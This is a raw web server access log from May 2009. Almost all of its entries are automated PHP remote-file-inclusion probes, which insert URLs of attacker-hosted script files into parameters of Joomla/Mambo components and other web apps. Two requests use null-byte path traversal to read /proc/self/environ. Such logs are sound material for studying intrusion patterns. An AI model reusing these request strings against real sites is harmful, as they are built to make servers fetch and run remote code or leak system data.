86.39.131.85 - - [26/May/2009:09:56:06 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
218.185.20.88 - - [26/May/2009:09:57:12 -0500] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:57:12 -0500] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:57:12 -0500] "GET /logs/access_log.1235433600//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:57:20 -0500] "GET /logs/access_log.1238630400//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:58:29 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:58:29 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:58:29 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:37 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:37 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:37 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:37 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:47 -0500] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:47 -0500] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:47 -0500] "GET /logs/access_log.1235433600//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:10:00:47 -0500] "GET /logs/access_log.1238630400//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:03:03 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:08 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
65.55.106.147 - - [26/May/2009:10:03:19 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.212.165.114 - - [26/May/2009:10:03:22 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:22 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:34 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:34 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:48 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:03:48 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:04:23 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:04:23 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:04:55 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:04:55 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:04:58 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:02 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:06 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:06 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:06 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:10 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:17 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:19 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:38 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:38 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:39 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:39 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:51 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:56 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:56 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:56 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:58 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:05:59 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:06:01 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:06:04 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:06:13 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:06:17 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
64.38.8.86 - - [26/May/2009:10:06:40 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:06:40 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:06:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:07:01 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:07:06 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:07:10 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:07:15 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
64.38.8.86 - - [26/May/2009:10:07:26 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:07:26 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:07:29 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:07:31 -0500] "GET /main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:07:31 -0500] "GET /logs/main.php?pagina=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
64.38.8.86 - - [26/May/2009:10:08:32 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:08:32 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:08:32 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.241.40.51 - - [26/May/2009:10:09:54 -0500] "GET /logs/access_log.1228608000%20%20//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
211.241.40.51 - - [26/May/2009:10:09:54 -0500] "GET /logs//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.241.40.51 - - [26/May/2009:10:09:54 -0500] "GET //vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:10:37 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:10:37 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:10:37 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
220.181.7.97 - - [26/May/2009:10:10:57 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.44.232.81 - - [26/May/2009:10:15:36 -0500] "GET //admin/global.php?config[installdir]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:10:15:36 -0500] "GET /logs//admin/global.php?config[installdir]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 305 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:10:15:36 -0500] "GET /logs/access_log.1236384000//admin/global.php?config[installdir]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:15:44 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:15:46 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:15:47 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:10:16:10 -0500] "GET /logs/access_log.1239753600//admin/global.php?config[installdir]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:16:29 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:16:30 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:16:32 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:18:19 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:18:19 -0500] "GET /logs/access_log.1239408000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:18:19 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.221.130.12 - - [26/May/2009:10:19:24 -0500] "GET /?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.12 - - [26/May/2009:10:19:26 -0500] "GET /logs/?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 190841 "-""libwww-perl/5.805"
72.29.68.196 - - [26/May/2009:10:21:05 -0500] "GET /logs//lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:10:21:05 -0500] "GET /logs//lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:10:21:05 -0500] "GET //lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:10:21:05 -0500] "GET //lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:10:21:05 -0500] "GET /logs//lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:10:21:06 -0500] "GET //lib/poll.lib.php?g4[path]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
200.142.148.142 - - [26/May/2009:10:21:44 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.142.148.142 - - [26/May/2009:10:21:44 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.142.148.142 - - [26/May/2009:10:21:44 -0500] "GET /logs/access_log.1238976000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
200.142.148.142 - - [26/May/2009:10:21:44 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
64.38.8.86 - - [26/May/2009:10:21:59 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.7.201.86 - - [26/May/2009:10:22:03 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.7.201.86 - - [26/May/2009:10:22:03 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.38.8.86 - - [26/May/2009:10:22:17 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:23:44 -0500] "GET //errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:23:44 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:23:44 -0500] "GET /logs//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:23:44 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:24:20 -0500] "GET /logs//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:24:20 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:24:20 -0500] "GET //errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:24:20 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:24:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:24:48 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:10:24:49 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:17 -0500] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:17 -0500] "GET /logs///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:25:19 -0500] "GET //include/write.php?dir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:25:19 -0500] "GET /logs//include/write.php?dir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:25:19 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:23 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:23 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:10:25:26 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:49 -0500] "GET /logs///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:49 -0500] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:54 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:10:25:54 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.7.201.86 - - [26/May/2009:10:26:00 -0500] "GET /logs//errors.php?error=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.826"
66.7.201.86 - - [26/May/2009:10:26:00 -0500] "GET //errors.php?error=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.826"
67.212.165.114 - - [26/May/2009:10:27:26 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:27:31 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:27:31 -0500] "GET /logs/access_log.1239408000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:10:28:11 -0500] "GET /logs/access_log.1242086400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
